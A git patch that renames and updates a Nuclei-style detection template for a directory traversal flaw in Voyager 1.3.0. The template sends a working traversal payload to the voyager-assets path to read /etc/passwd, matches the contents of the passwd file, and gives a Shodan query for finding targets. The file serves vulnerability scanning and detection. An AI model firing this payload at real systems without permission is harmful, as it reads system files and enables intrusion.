From 869bf27a3745a648df11c7fce2c43a80740d8a2b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 31 Mar 2024 23:11:43 +0530 Subject: [PATCH] Update and rename voyager-path-traversal.yaml to voyager-lfi.yaml --- ...r-path-traversal.yaml => voyager-lfi.yaml} | 28 +++++++++++-------- 1 file changed, 17 insertions(+), 11 deletions(-) rename http/vulnerabilities/other/{voyager-path-traversal.yaml => voyager-lfi.yaml} (57%) diff --git a/http/vulnerabilities/other/voyager-path-traversal.yaml b/http/vulnerabilities/other/voyager-lfi.yaml similarity index 57% rename from http/vulnerabilities/other/voyager-path-traversal.yaml rename to http/vulnerabilities/other/voyager-lfi.yaml index 8be474a7d3..a5cf9d6ae1 100644 --- a/http/vulnerabilities/other/voyager-path-traversal.yaml +++ b/http/vulnerabilities/other/voyager-lfi.yaml @@ -1,33 +1,39 @@ -id: voyager-path-traversal +id: voyager-lfi info: - name: voyager_directory_traversal + name: Voyager 1.3.0 - Directory Traversal author: mammad_rahimzada severity: high - description: voyager 1.3.0 is vulnerable to local file inclusion. + description: | + Voyager 1.3.0 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/47875 + - https://www.exploit-db.com/exploits/47875 classification: cvss-score: 7.5 cwe-id: CWE-22 - tags: voyager , lfi + metadata: + verified: true + max-request: 1 + shodan-query: html:"voyager-assets" + tags: voyager,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd" - stop-at-first-match: true matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - condition: or + + - type: word + part: header + words: + - "text/plain" - type: status status: - 200 -